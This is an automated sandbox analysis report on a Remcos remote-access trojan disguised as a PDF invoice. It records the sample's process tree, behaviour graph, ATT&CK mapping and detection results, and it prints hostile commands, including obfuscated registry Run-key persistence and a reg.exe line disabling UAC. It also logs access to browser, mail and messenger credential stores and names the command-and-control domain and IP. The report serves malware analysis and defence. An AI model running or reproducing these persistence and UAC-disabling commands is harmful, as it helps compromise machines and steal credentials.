            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\avtrjqntogc"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "husmndenes" /t reg_expand_sz /d "%tomboyism% -windowstyle minimized $eftertaklede=(get-itemproperty -path 'hkcu:\bukkespringenes\').hovedstads;%tomboyism% ($eftertaklede)"
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "husmndenes" /t reg_expand_sz /d "%tomboyism% -windowstyle minimized $eftertaklede=(get-itemproperty -path 'hkcu:\bukkespringenes\').hovedstads;%tomboyism% ($eftertaklede)"Jump to behavior
            Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager'
            Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managervider
            Source: Nubilum.exe, 00000010.00000003.1685702542.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1684092938.0000000002873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV\
            Source: Nubilum.exe, 00000010.00000003.1685702542.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715637913.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1684092938.0000000002873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\R|FK
            Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\2
            Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
            Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager2\
            Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\-\
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\(a~
            Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
            Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\
            Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\*
            Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\.|jK
            Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager>
            Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTD~1
            Source: Nubilum.exe, 00000010.00000003.1715637913.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.0000000002874000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB2933 cpuid 16_2_1FAB2933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,16_2_1FAB2264
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,29_2_004082CD
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeCode function: 0_2_004060E3 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004060E3
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: ESMTPPassword29_2_004033F0
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword29_2_00402DB3
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword29_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Nubilum.exe PID: 1912, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4DJump to behavior
            Source: Yara matchFile source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts112
            Command and Scripting Interpreter
            Logon Script (Windows)212
            Process Injection
            2
            Obfuscated Files or Information
            2
            Credentials in Registry
            3
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login Hook1
            Registry Run Keys / Startup Folder
            2
            Software Packing
            1
            Credentials In Files
            139
            System Information Discovery
            Distributed Component Object Model11
            Input Capture
            1
            Remote Access Software
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets241
            Security Software Discovery
            SSH2
            Clipboard Data
            2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading
            Cached Domain Credentials41
            Virtualization/Sandbox Evasion
            VNCGUI Input Capture213
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Modify Registry
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
            Virtualization/Sandbox Evasion
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
            Process Injection
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465858 Sample: Vyuctovani_2024_07-12068124... Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 54 a458386d9.duckdns.org 2->54 56 geoplugin.net 2->56 58 2 other IPs or domains 2->58 74 Multi AV Scanner detection for domain / URL 2->74 76 Found malware configuration 2->76 78 Multi AV Scanner detection for submitted file 2->78 82 6 other signatures 2->82 10 Vyuctovani_2024_07-1206812497#U00b7pdf.exe 2 30 2->10         started        14 svchost.exe 1 1 2->14         started        signatures3 80 Uses dynamic DNS services 54->80 process4 dnsIp5 52 C:\Users\user\AppData\...\Svenskheds.Gre28, ASCII 10->52 dropped 94 Suspicious powershell command line found 10->94 17 powershell.exe 20 10->17         started        66 127.0.0.1 unknown unknown 14->66 file6 signatures7 process8 file9 46 C:\Users\user\AppData\Local\...46ubilum.exe, PE32 17->46 dropped 48 C:\Users\user\...48ubilum.exe:Zone.Identifier, ASCII 17->48 dropped 68 Writes to foreign memory regions 17->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 17->70 72 Powershell drops PE file 17->72 21 Nubilum.exe 5 17 17->21         started        26 conhost.exe 17->26         started        signatures10 process11 dnsIp12 60 a458386d9.duckdns.org 217.76.50.73, 3256, 49709, 49712 SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE Sweden 21->60 62 drive.usercontent.google.com 142.250.186.161, 443, 49708 GOOGLEUS United States 21->62 64 2 other IPs or domains 21->64 50 C:\ProgramData\remcos\logs.dat, data 21->50 dropped 86 Multi AV Scanner detection for dropped file 21->86 88 Detected unpacking (changes PE section rights) 21->88 90 Detected Remcos RAT 21->90 92 5 other signatures 21->92 28 cmd.exe 1 21->28         started        31 Nubilum.exe 1 21->31         started        33 Nubilum.exe 1 21->33         started        35 2 other processes 21->35 file13 signatures14 process15 signatures16 96 Uses cmd line tools excessively to alter registry or file data 28->96 37 reg.exe 1 28->37         started        40 conhost.exe 28->40         started        98 Tries to steal Instant Messenger accounts or passwords 31->98 100 Tries to harvest and steal browser information (history, passwords, etc) 31->100 102 Tries to steal Mail credentials (via file / registry access) 33->102 42 conhost.exe 35->42         started        44 reg.exe 1 1 35->44         started        process17 signatures18 84 Disables UAC (registry) 37->84

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Vyuctovani_2024_07-1206812497#U00b7pdf.exe14%VirustotalBrowse
            Vyuctovani_2024_07-1206812497#U00b7pdf.exe29%ReversingLabsWin32.Backdoor.Remcos
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Nubilum.exe21%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Local\Temp\Nubilum.exe14%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            geoplugin.net1%VirustotalBrowse
            drive.google.com0%VirustotalBrowse
            drive.usercontent.google.com1%VirustotalBrowse
            a458386d9.duckdns.org13%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            http://geoplugin.net/json.gp0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://drive.google.com/x0%Avira URL Cloudsafe
            http://www.imvu.comr0%Avira URL Cloudsafe
            http://www.imvu.com0%Avira URL Cloudsafe
            http://www.imvu.com0%VirustotalBrowse
            http://geoplugin.net/json.gp(0%VirustotalBrowse
            http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
            http://geoplugin.net/json.gp(0%Avira URL Cloudsafe
            https://drive.google.com/x1%VirustotalBrowse
            http://geoplugin.net/json.gpt0%Avira URL Cloudsafe
            https://g.live.com/odclientsettings/ProdV21C:0%Avira URL Cloudsafe
            http://crl.ver)0%Avira URL Cloudsafe
            https://drive.usercontent.google.com/0%Avira URL Cloudsafe
            http://www.imvu.comppData0%Avira URL Cloudsafe
            http://geoplugin.net/json.gp&-0%Avira URL Cloudsafe
            http://www.nirsoft.net0%Avira URL Cloudsafe
            https://drive.usercontent.google.com/1%VirustotalBrowse
            http://geoplugin.net/json.gpt0%VirustotalBrowse
            a458386d9.duckdns.org0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.nirsoft.net0%VirustotalBrowse
            a458386d9.duckdns.org13%VirustotalBrowse
            http://geoplugin.net/json.gpB0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpl0%VirustotalBrowse
            https://g.live.com/odclientsettings/Prod1C:0%Avira URL Cloudsafe
            https://github.com/Pester/Pester1%VirustotalBrowse
            http://geoplugin.net/0%Avira URL Cloudsafe
            https://drive.google.com/0%Avira URL Cloudsafe
            https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
            https://login.yahoo.com/config/login0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpV0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            http://geoplugin.net/1%VirustotalBrowse
            http://geoplugin.net/30%Avira URL Cloudsafe
            http://geoplugin.net/json.gpB0%VirustotalBrowse
            http://www.nirsoft.net/0%Avira URL Cloudsafe
            https://login.yahoo.com/config/login0%VirustotalBrowse
            http://www.ebuddy.com0%Avira URL Cloudsafe
            https://www.google.com/accounts/servicelogin0%VirustotalBrowse
            https://drive.google.com/1%VirustotalBrowse
            http://geoplugin.net/json.gpV0%VirustotalBrowse
            http://geoplugin.net/30%VirustotalBrowse
            http://www.nirsoft.net/0%VirustotalBrowse
            http://www.ebuddy.com0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            178.237.33.50
            truefalseunknown
            drive.google.com
            142.250.186.174
            truefalseunknown
            drive.usercontent.google.com
            142.250.186.161
            truefalseunknown
            a458386d9.duckdns.org
            217.76.50.73
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            a458386d9.duckdns.orgtrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://geoplugin.net/json.gpfalse
            • URL Reputation: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://geoplugin.net/json.gp(Nubilum.exe, 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
